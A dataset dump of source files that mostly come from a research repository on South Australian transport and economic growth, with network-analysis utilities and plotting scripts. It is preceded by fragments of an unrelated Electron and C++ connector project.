"text": "{\t\"variables\": {\n\t},\n \"targets\": [{\n \"target_name\": \"integrated_cpp_connector\",\n \"cflags!\": [ \"-fno-exceptions\" ],\n \"cflags_cc!\": [ \"-fno-exceptions\" ],\n \"ldflags!\": [\"-rpath\",\".\"],\n \"sources\": [\n \"main_CPPconnector.cpp\"\n ],\n 'include_dirs': [\n \"<!@(node -p \\\"require('node-addon-api').include\\\")\",\n\t\t\t\"./include\"\n ],\n\t\t 'libraries':[\"-Wl,-rpath,.\",\"-L/hd0/lance/projects/BCL_interface/final/src/cppsrc/CPPconnector/include\",\"-lCPPconnector\"],\n 'dependencies': [\n \"<!(node -p \\\"require('node-addon-api').gyp\\\")\"\n ],\n 'defines': [ 'NAPI_DISABLE_CPP_EXCEPTIONS' ]\n }]\n}\n"
},
{
"alpha_fraction": 0.6945193409919739,
"alphanum_fraction": 0.701707124710083,
"avg_line_length": 22.680850982666016,
"blob_id": "e1b030a4125dcf96fdadbba4c19a1bfa10d7fe62",
"content_id": "01907cf1c483485bb6118ee8ec589aebeb02a217",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1113,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 47,
"path": "/main.js",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "const {app, BrowserWindow, ipcMain} = require('electron');\nconst cpp_connector = require('./src/cppsrc/CPPconnector/build/Release/integrated_cpp_connector.node');\n\n\nlet mainWindow;\n\nfunction createWindow () {\n\tmainWindow = new BrowserWindow({\n\t\twidth: 1000,\n\t\theight: 800,\n\t\twebPreferences: {\n\t\t\tnodeIntegration: true\n\t\t}\n\t});\n\t\n\n\t//open DevTool if needed\n\tmainWindow.webContents.openDevTools();\n\t\n\tmainWindow.loadURL(`file://${__dirname}/src/index.html`);\n};\n\nfunction getFromCpp(input){\n\tmodule.exports = cpp_connector;\n\tcpp_output = cpp_connector.hello(input-1);\n\treturn cpp_output;\n}\n\napp.on('ready', createWindow);\n\napp.on('window-all-closed', () => {\n\t// On macOS it is common for applications and their menu bar\n\t// to stay active until the user quits explicitly with Cmd + Q\n\tif (process.platform !== 'darwin') {\n\t app.quit()\n\t}\n});\n\n\nipcMain.on('signalToMain', (event, arg)=> {\n\tconsole.log('main process receiced signal from renderer process, msg:'+arg);\n\t\n\tvar output = getFromCpp(arg);\n\tconsole.log('main process received output from c++, msg:' +output);\n\n\tevent.reply('signalToRenderer', output)\n})\n"
},
{
"alpha_fraction": 0.6649423837661743,
"alphanum_fraction": 0.6677639484405518,
"avg_line_length": 46.78651809692383,
"blob_id": "06e6fcd400eea69829cba0b3620c4bfccf0fe364",
"content_id": "30117e2cad2b154d3c9d8f2c92c550905328b048",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4253,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 89,
"path": "/src/cppsrc/CPPconnector/bcl_chemistry_ligand_design_helper.h",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "// (c) Copyright BCL @ Vanderbilt University 2014\n// (c) BCL Homepage: http://www.meilerlab.org/bclcommons\n// (c) The BCL software is developed by the contributing members of the BCL @ Vanderbilt University\n// (c) This file is part of the BCL software suite and is made available under license.\n// (c) To view or modify this file, you must enter into one of the following agreements if you have not done so already:\n// (c) For academic and non-profit users:\n// (c) the BCL Academic Single-User License, available at http://www.meilerlab.org/bclcommons/license\n// (c) For commercial users:\n// (c) The BCL Commercial Site License, available upon request from [email protected]\n// (c) For BCL developers at Vanderbilt University:\n// (c) The BCL Developer Agreement, available at http://www.meilerlab.org/bclcommons/developer_agreement\n// (c)\n// (c) As part of all such agreements, this copyright notice must appear, verbatim and without addition, at the\n// (c) top of all source files of the BCL project and may not be modified by any party except the BCL developers at\n// (c) Vanderbilt University.\n// (c) The BCL copyright and license yields to non-BCL copyrights and licenses where indicated by code comments.\n// (c) Questions about this copyright notice or license agreement may be emailed to [email protected]\n// (c) (for academic users) or [email protected] (for commercial users)\n\n#ifndef BCL_CHEMISTRY_LIGAND_DESIGN_HELPER_H_\n#define BCL_CHEMISTRY_LIGAND_DESIGN_HELPER_H_\n\n// include the namespace header\n#include \"bcl_defines.h\"\n\n// include other forward headers - sorted alphabetically\n\n// includes from bcl - sorted alphabetically\n#include <string>\n\nnamespace bcl\n{\n namespace chemistry\n {\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n //!\n //! @class LigandDesignHelper\n //! @brief Functionality needed by the (java-based) BCL::LigandDesign tool\n //!\n //! @see @link example_chemistry_ligand_design_helper.cpp @endlink\n //! @author mendenjl\n //! @date Mar 02, 2015\n //!\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\n class BCL_API LigandDesignHelper\n {\n public:\n\n //! @brief get the comma separated conformation-independent properties\n //! @return the comma-seperated conformation-independent properties\n static const std::string &GetAvailableProperties();\n\n //! @brief get the comma separated predictions list\n //! @note prediction is defined here as anything that requires a conformation\n //! @return the comma-seperated predictions list\n static const std::string &GetAvailablePredictions();\n\n //! @brief set the directory of the jar file. This is used to locate the bcl-related files\n //! @param JAR_FILE_DIRECTORY the directory containing the jar file; should also contain a bcl folder\n static void SetJarDirectory( const std::string &JAR_FILE_DIR);\n\n //! @brief calculate conformation-independent properties.\n //! @param MOLECULE molecule of interest, encoded as a string in SDF format\n //! @param DESCRIPTORS descriptors (comma seperated) to calculate for the molecule\n //! @return DESCRIPTORS given as values in a comma separated list.\n //! Elements in vector-valued descriptors separated by spaces\n //! Note that if the atom types are undefined, returns empty string\n static std::string CalculateProperties\n (\n const std::string &MOLECULE,\n const std::string &PROPERTIES\n );\n\n //! 
@brief processes the molecule; producing a 3d-conformation,\n //! @param MOLECULE molecule of interest, encoded as a string in SDF format\n //! @param DESCRIPTORS descriptors (comma seperated) to calculate for the molecule\n //! @return molecule in sdf formation with 3D conformation and DESCRIPTORS as misc properties\n //! Note that if the atom types are undefined, an empty string is returned\n static std::string ProcessMolecule\n (\n const std::string &MOLECULE,\n const std::string &DESCRIPTORS\n );\n };\n } // namespace chemistry\n} // namespace bcl\n\n#endif // BCL_CHEMISTRY_LIGAND_DESIGN_HELPER_H_\n"
}
] | 8 |
SangYoop/boaz_blogmaking
|
https://github.com/SangYoop/boaz_blogmaking
|
48572c7d3a5440e0595d82b7ab87d2f2ea5552ce
|
1708bddcb0a82a589749f51d3bcb5b27df3f3e0a
|
6a6fbcf17ed0dd111d0f75d17ea10a9d40268e09
|
refs/heads/master
| 2021-01-21T01:44:06.203386 | 2016-08-11T07:54:29 | 2016-08-11T07:54:29 | 65,449,783 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.659237265586853,
"alphanum_fraction": 0.6661713719367981,
"avg_line_length": 34.438594818115234,
"blob_id": "3bcd331b1b78719ddc70074f085bce7f0096e157",
"content_id": "77d88bf5149386a8581e1178d65dd118716c6bfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2173,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 57,
"path": "/blog/views.py",
"repo_name": "SangYoop/boaz_blogmaking",
"src_encoding": "UTF-8",
"text": "#coding: utf-8\nfrom django.shortcuts import render,redirect,get_object_or_404\nfrom django.utils import timezone\nfrom .models import Post,Comment\n\n\n# Create your views here. \ndef index(request):\n posts = Post.objects.all().order_by('-published_date')\n user = request.user \n context = {'posts' : posts,'current_user':user,} #request한 사람이 누구인지를 변수로 만들어 던져줌\n return render(request, 'blog/index.html', context)\n\ndef write(request): ## request is one of the django's own objects\n post = Post() ## creating new object for our model\n post.author = request.user ## store author in post.author from request.user, django will make request for our model\n post.title = request.POST['title']\n post.text = request.POST['text']\n post.published_date = timezone.now()\n post.save()\n\n return redirect('blog.views.index')\n \ndef delete(request,pk):\n post = get_object_or_404(Post,pk = pk)\n post.delete()\n return redirect('blog.views.index')\n \ndef edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == \"POST\": ## get dictionary, get is used transferring pk\n post.author = request.user\n post.title = request.POST['title']\n post.text = request.POST['content']\n post.published_date = timezone.now()\n post.save()\n return redirect('blog.views.index')\n else:\n context={'post' : post}\n return render(request, 'blog/post_edit.html', context)\n\ndef reply_write(request):\n comment = Comment()\n # Comment는 비록 post라는 attribute를 가지지만 Post 모델의 인스턴스와 1:N의 관계를\n # 맺으려면 _id를 덧붙여서 post_id 즉 primary key를 통해 관계를 맺을 수 있다.\n comment.post_id = request.POST['id_of_post'] #post의 pk를 다루기 위함! id_of_post > name!\n comment.author = request.user\n comment.text = request.POST['content']\n comment.save()\n \n return redirect('blog.views.index')\n \ndef reply_delete(request, pk):\n comment = get_object_or_404(Comment, pk=pk) #get방식은 인자를 알려줌\n comment.delete()\n \n return redirect('blog.views.index')"
}
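A note on the views above: they redirect with dotted view paths such as 'blog.views.index', the pre-Django-1.10 style of URL reversing, and they read form fields like 'title', 'content', and 'id_of_post' from request.POST. Below is a minimal sketch of the blog/urls.py this module appears to assume; the regex routes are illustrative assumptions, not taken from the repository.

# Hypothetical blog/urls.py sketch (old-style Django URL conf; the routes are assumed)
from django.conf.urls import url
from . import views

urlpatterns = [
    url(r'^$', views.index),                                     # post list
    url(r'^write/$', views.write),                               # create a post
    url(r'^delete/(?P<pk>[0-9]+)/$', views.delete),              # delete a post by pk
    url(r'^edit/(?P<pk>[0-9]+)/$', views.edit),                  # edit a post by pk
    url(r'^reply/write/$', views.reply_write),                   # create a comment
    url(r'^reply/delete/(?P<pk>[0-9]+)/$', views.reply_delete),  # delete a comment by pk
]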
] | 1 |
cjsyzwsh/South_Australia_Transport_Econ
|
https://github.com/cjsyzwsh/South_Australia_Transport_Econ
|
d1dafa11487ecae3a1eeb9601229bd1a3af219de
|
8c27f3015193113f8f479e7c0e0c3ff1ac42944e
|
eb1b97853c308cb0f9532730d6ad15edf508a141
|
refs/heads/main
| 2023-05-10T11:48:34.291455 | 2021-06-14T17:00:03 | 2021-06-14T17:00:03 | 353,466,500 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4552238881587982,
"alphanum_fraction": 0.6641790866851807,
"avg_line_length": 13.88888931274414,
"blob_id": "39bea3f8c0485d8e1ecef31876e2bd8fea856b53",
"content_id": "7e316eca3337c0d8d28e7868ffb21b0f841b65b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 134,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "momepy==0.4.4\nnetworkx==2.5.1\npandas==1.2.4\ngeoplot==0.4.1\nmatplotlib==3.4.1\nscipy==1.6.3\ngeopandas==0.9.0\nnumpy==1.20.2\npysal==2.4.0\n"
},
{
"alpha_fraction": 0.7952380776405334,
"alphanum_fraction": 0.7952380776405334,
"avg_line_length": 50.5,
"blob_id": "9acb8571378862476d923c7df001aa52d9fc1e5e",
"content_id": "cd80e4bf3f4b454ee6dbbb5c81a36b8d35e9f8b8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 210,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 4,
"path": "/README.md",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# South_Australia_Transport_Econ\nThis repository analyzes the relationship between transport infrastructure and economic growth in South Australia. It is conducted by Shenhao Wang at Media Lab, MIT.\n\n## Examples\n\n\n\n\n"
},
{
"alpha_fraction": 0.720812201499939,
"alphanum_fraction": 0.7284263968467712,
"avg_line_length": 31.83333396911621,
"blob_id": "f324800c25fea4d14c1f978507e1ae48b52d4be2",
"content_id": "1951252409a8b77b47f31b1a514a1d20ce642133",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 394,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 12,
"path": "/setup.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# sw: not necessary at this point since it is about publishing the repo as a package.\n\nfrom setuptools import find_packages, setup\n\nsetup(\n name='network analysis for transport and economy',\n packages=find_packages(),\n version='0.1.0',\n description='Analyze the relationship between economic growth and transport through network analysis',\n author='Shenhao Wang',\n license='MIT',\n)\n"
},
{
"alpha_fraction": 0.7239593267440796,
"alphanum_fraction": 0.7291396856307983,
"avg_line_length": 44.686439514160156,
"blob_id": "4c960d38fc087c7430a490e465520ab37919eb79",
"content_id": "93fabbaf3cef0af68a943bf98a20d58d8d1fbbcd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5405,
"license_type": "permissive",
"max_line_length": 174,
"num_lines": 118,
"path": "/src/d06_visualization/visualize_policy_simul.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# Visualize the change of nodal and link attributes with policy simulation\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read files\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'rb') as f:\n edge_df_policy_simulation = pickle.load(f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'rb') as f:\n node_df_policy_simulation = pickle.load(f)\n\n\n# merge\n# five columns are relevant:\n# edge_df_policy_simulation: od_duration_save, consumption_amount_increase, consumption_count_increase, flow_agents_increase\n# node_df_policy_simulation: income_increase\nedge_shp = edge_shp.merge(edge_df_policy_simulation[['O','D','od_duration_save','consumption_amount_increase','consumption_count_increase','flow_agents_increase']],\n left_on=['O','D'], right_on=['O','D'],how='inner')\n\nnode_shp = node_shp.merge(node_df_policy_simulation[['SA2_MAIN16','income_increase','job_based_consumption_opportunity_increase','pop_based_consumption_opportunity_increase',\n 'amenity_based_consumption_opportunity_increase','diversity_based_consumption_opportunity_increase']],\n on=['SA2_MAIN16'],how='inner')\n\n#\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp_complete = pickle.load(f)\n\n\n# visualize node change\n# sparse = True # control the visual density in the visualization\ncolumn_name = 'income_increase'\ntitle_name = 'Increase of median income'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_income_increase'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n# ratio\nnode_shp['income_increase_ratio'] = node_shp['income_increase']/node_shp['median_income_per_job_aud_persons']\ncolumn_name = 'income_increase_ratio'\ntitle_name = 'Increase of median income ratio'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_income_increase_ratio'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n#\ncolumn_name = 'pop_based_consumption_opportunity_increase'\ntitle_name = 'Increase of population-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_pop_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'job_based_consumption_opportunity_increase'\ntitle_name = 'Increase of job-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_job_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 
'amenity_based_consumption_opportunity_increase'\ntitle_name = 'Increase of amenity-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_amenity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'diversity_based_consumption_opportunity_increase'\ntitle_name = 'Increase of diversity-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_diversity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n\n\n# visualize edge changes\nsparse = False # control the visual density in the visualization. Here I think non-sparse visualization is better.\nplot_dic = [('od_duration_save', 'Travel time saved', 'simulation_od_duration_save'),\n ('consumption_amount_increase', 'Increase of consumption amount', 'simulation_consumption_amount_increase'),\n ('consumption_count_increase', 'Increase of consumption counts', 'simulation_consumption_count_increase'),\n ('flow_agents_increase', 'Increase of people flow', 'simulation_flow_agents_increase')]\n\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n save_path = report_path+'policy_simulation/'\n if not sparse:\n fig_name = each_plot[2]\n util.plot_sa2_edge_attributes(edge_shp, node_shp, column_name, title_name, fig_name, save_path)\n else:\n fig_name = each_plot[2]+'_sparse'\n edge_shp_sparse = edge_shp.loc[edge_shp[column_name] > np.mean(edge_shp[column_name])+np.std(edge_shp[column_name]), :]\n util.plot_sa2_edge_attributes(edge_shp_sparse, node_shp, column_name, title_name, fig_name, save_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7150657176971436,
"alphanum_fraction": 0.7256441116333008,
"avg_line_length": 44.4765625,
"blob_id": "ff7189ce7e560875caf298bb8147a4419f792513",
"content_id": "eba9756db37e2397e28340b3309830f915a18400",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5861,
"license_type": "permissive",
"max_line_length": 205,
"num_lines": 128,
"path": "/src/d06_reporting/print_descriptive_stats.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# this script prints out the descriptive stats to facilitate paper writing.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport copy\n\n# system path\nimport sys\nimport os\nimport seaborn as sns\n\n# use ggplot style\nplt.style.use('ggplot')\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n\n#\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'rb') as f:\n edge_df_policy_simulation = pickle.load(f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'rb') as f:\n node_df_policy_simulation = pickle.load(f)\n\n\n# printing\nprint(\"Number of flow observations is: \", edge_flow_df[['flow_agents']].shape[0])\nprint(\"Number of consumption counts is: \", edge_consumption_df[['consumption_count_mcc_source']].shape[0])\nprint(\"Number of consumption amount is: \", edge_consumption_df[['consumption_amount_mcc_source']].shape[0])\nprint(\"Average travel time is: \", edge_flow_df['od_duration'].mean()/60)\nprint(\"Average travel distance is: \", edge_flow_df['od_distance'].mean())\n\n# descriptive tables\n# socio econ\ndescriptive_table = node_df[['median_income_per_job_aud_persons', 'total_pop']].describe().T\ndescriptive_table.index = ['inc', 'total_pop']\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'socioecon.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\n# visual\nfig,ax = plt.subplots(1,2, figsize = (10, 3))\nax[0].hist(node_df['median_income_per_job_aud_persons'], bins=15, color = 'lightcoral')\nax[1].hist(node_df['total_pop'], bins=15, color = 'bisque')\nax[0].set_title(\"Median income\")\nax[1].set_title(\"Total population\")\nfig.savefig(report_path+'descriptive_visual/'+'socioecon.png')\nplt.close()\n\n\n# mobility and consumption flow\ndescriptive_table = edge_flow_df[['flow_agents']].describe().T\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'mobility_flow.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\ndescriptive_table = edge_consumption_df[['consumption_count_mcc_source', 'consumption_amount_mcc_source']].describe().T\ndescriptive_table.index = ['consumption counts', 'consumption amount']\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'consumption_flow.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\nfig,ax = plt.subplots(1,3, figsize = (10, 3))\nax[0].hist(edge_flow_df['flow_agents'], bins=15, color = 
'lightcoral')\nax[1].hist(edge_consumption_df['consumption_count_mcc_source'], bins=15, color = 'bisque')\nax[2].hist(edge_consumption_df['consumption_amount_mcc_source'], bins=15, color = 'moccasin')\nax[0].set_title(\"Mobility flow\")\nax[1].set_title(\"Consumption counts\")\nax[2].set_title(\"Consumption amount\")\nfig.savefig(report_path+'descriptive_visual/'+'flow.png')\nplt.close()\n\n\n# travel time and distance\ndescriptive_table = edge_shp[['od_duration', 'od_distance']].describe().T\ndescriptive_table.index = ['OD Duration', 'OD Distance']\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'travel_time_distance.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\nfig,ax = plt.subplots(1,2, figsize = (10, 3))\nax[0].hist(edge_shp['od_duration'], bins=15, color = 'lightcoral')\nax[1].hist(edge_shp['od_distance'], bins=15, color = 'bisque')\nax[0].set_title(\"Travel time\")\nax[1].set_title(\"Travel distance\")\nfig.savefig(report_path+'descriptive_visual/'+'travel.png')\nplt.close()\n\n\n#\nprint(\"Average travel time save ratio is:\", np.mean(edge_df_policy_simulation['od_duration_save']/edge_df_policy_simulation['od_duration']))\nprint(\"Max travel time save ratio is:\", np.max(edge_df_policy_simulation['od_duration_save']/edge_df_policy_simulation['od_duration']))\nprint(\"Average income increase ratio is:\", np.mean(node_df_policy_simulation['income_increase']/node_df_policy_simulation['median_income_per_job_aud_persons']))\nprint(\"Max income increase ratio is:\", np.max(node_df_policy_simulation['income_increase']/node_df_policy_simulation['median_income_per_job_aud_persons']))\nprint(\"Average econ opportunity increase ratio is:\", np.mean(node_df_policy_simulation['amenity_based_consumption_opportunity_increase']/node_df_policy_simulation['amenity_based_consumption_opportunity']))\nprint(\"Max econ opportunity increase ratio is:\", np.max(node_df_policy_simulation['amenity_based_consumption_opportunity_increase']/node_df_policy_simulation['amenity_based_consumption_opportunity']))\nprint(\"Status quo Gini index is: \", util.gini(list(node_df_policy_simulation['median_income_per_job_aud_persons'])))\nnew_inc = node_df_policy_simulation['median_income_per_job_aud_persons']+node_df_policy_simulation['income_increase']\nnew_inc.dropna(inplace = True)\nprint(\"New Gini index is: \", util.gini(list(new_inc)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5670908093452454,
"alphanum_fraction": 0.5820974111557007,
"avg_line_length": 36.150325775146484,
"blob_id": "051851b7f13734591aca1384d727a715319dcbc9",
"content_id": "042c89325647698945ffa8a857f69f16a22ec1d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11395,
"license_type": "permissive",
"max_line_length": 148,
"num_lines": 306,
"path": "/src/d00_utils/utilities.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport momepy\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom sklearn import linear_model\nimport statsmodels.api as sm\nimport matplotlib.pylab as pylab\n\n\ndef compute_road_attributes(shp, road_shp):\n \"\"\"\n Inputs:\n shp - a shp file\n road_shp - the shp file containing road information\n Outputs:\n One shapefile that incorporates the road class attributes\n One shapefile that incorporates the roads in only Adelaide area\n \"\"\"\n \n print(\"=====Running union_road_land_shp=====\")\n \n # create the centroids for roads\n road_centroid = road_shp.centroid\n \n # attach SA2 idx to road networks\n road_shp['SA2_loc'] = -1 # init as -1.\n\n for SA2_idx in range(shp.shape[0]):\n print(SA2_idx)\n \n # assign SA2_idx to the road network\n within_logic = road_centroid.within(shp.loc[SA2_idx, 'geometry'])\n road_shp.loc[within_logic, 'SA2_loc'] = SA2_idx\n \n # Use only the 'class' variable for now. \n road_shp = road_shp[['class', 'geometry', 'SA2_loc']]\n road_shp_dummies = pd.get_dummies(road_shp)\n \n # aggregate the road attribute dummies for SA2.\n road_shp_dummies = road_shp_dummies.loc[road_shp_dummies['SA2_loc'] > -1]\n sa2_road_class_agg=road_shp_dummies.groupby(by='SA2_loc').sum()\n \n # augment road class variables to SA2_network.\n shp = shp.merge(sa2_road_class_agg, how='inner', left_index=True, right_index=True)\n \n # create road networks for only Adelaide\n road_shp_adelaide = road_shp.loc[road_shp['SA2_loc']>-1, :]\n\n print(\"=====DONE union_road_land_shp=====\")\n \n return shp, road_shp_adelaide\n\n\n\ndef compute_intersection_attributes(shp_proj, road_proj):\n \"\"\"\n Inputs:\n shp_proj - a shp projection merged with road info; the first output compute_road_attributes(shp, road_shp)\n road_proj - a shp projection that has only road information; the second output of compute_road_attributes(shp, road_shp)\n Outputs:\n degree_df - a df with SA2 code and its degree counts\n \"\"\"\n\n count = {}\n \n for elt in road_proj[\"SA2_loc\"]:\n if elt in count:\n count[elt] += 1\n else:\n count[elt] = 1\n SA_idxs = sorted((key,count[key]) for key in count)\n \n # create a dictionary to map sa_idx to road graphs\n sa_idx_to_graph = {}\n for sa_idx,c in SA_idxs:\n within = road_proj[road_proj[\"SA2_loc\"]==sa_idx]\n graph = momepy.gdf_to_nx(within, approach='primal')\n sa_idx_to_graph[sa_idx] = graph\n\n # initialize the dataframe for intersections \n degree_df = pd.DataFrame(columns=[\"SA2_MAIN16\", \"num_nodes\", \n \"num_1degree\", \"num_2degree\", \n \"num_3degree\", \"num_4degree\", \n \"num_greater5degree\"])\n\n # compute the degrees of roads for each SA_idx\n for sa_idx in sa_idx_to_graph:\n g = sa_idx_to_graph[sa_idx]\n degree = dict(nx.degree(g))\n nx.set_node_attributes(g, degree, 'degree')\n g = momepy.node_degree(g, name='degree')\n node_df, edge_df, sw = momepy.nx_to_gdf(g, points=True, lines=True, spatial_weights=True)\n\n SA2_MAIN16 = shp_proj.iloc[sa_idx][\"SA2_MAIN16\"]\n #nodes is intersections\n num_nodes = len(node_df)\n #num_0degree = len(node_df[node_df[\"degree\"]==0])\n num_1degree = len(node_df[node_df[\"degree\"]==1])\n num_2degree = len(node_df[node_df[\"degree\"]==2])\n num_3degree = len(node_df[node_df[\"degree\"]==3])\n num_4degree = len(node_df[node_df[\"degree\"]==4])\n num_greater5degree = len(node_df[node_df[\"degree\"]>=5])\n degree_df = degree_df.append({\"SA2_MAIN16\": SA2_MAIN16, 
\"num_nodes\":num_nodes, \n \"num_1degree\":num_1degree, \"num_2degree\":num_2degree, \"num_3degree\":num_3degree,\n \"num_4degree\":num_4degree,\n \"num_greater5degree\":num_greater5degree},\n ignore_index=True)\n \n return degree_df\n\n\ndef plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete = None):\n '''\n plot the attributes for the SA2 nodes\n '''\n fig, ax = plt.subplots(figsize=(8, 8))\n divider = make_axes_locatable(ax) # for legend size\n cax = divider.append_axes(\"right\", size=\"8%\", pad=0.1) # for legend size\n\n if node_shp_complete is not None:\n node_shp_complete.plot(facecolor='w', edgecolor='lightgrey', ax = ax)\n node_shp.plot(facecolor='w', edgecolor='k', ax = ax)\n node_shp.plot(column = column_name, cmap='summer', legend=True, ax = ax, cax = cax) \n else:\n node_shp.plot(facecolor='w', edgecolor='k', ax = ax)\n node_shp.plot(column = column_name, cmap='summer', legend=True, ax = ax, cax = cax) \n # different cmaps: 'summer', 'OrRd'\n ax.set_title(title_name, fontsize=18)\n ax.set_axis_off()\n plt.tight_layout()\n fig.savefig(save_path+fig_name+'.png')\n plt.close()\n\n\ndef plot_sa2_edge_attributes(edge_shp, node_shp, column_name, title_name, fig_name, save_path):\n '''\n plot the attributes for the SA2 edges\n '''\n fig, ax = plt.subplots(figsize = (8, 8))\n node_shp.plot(facecolor='None', edgecolor='black', ax = ax, zorder = 10)\n node_shp.centroid.plot(ax = ax, facecolor = 'r', markersize = 5.0, zorder = 5)\n edge_shp.plot(column = column_name, cmap='turbo', 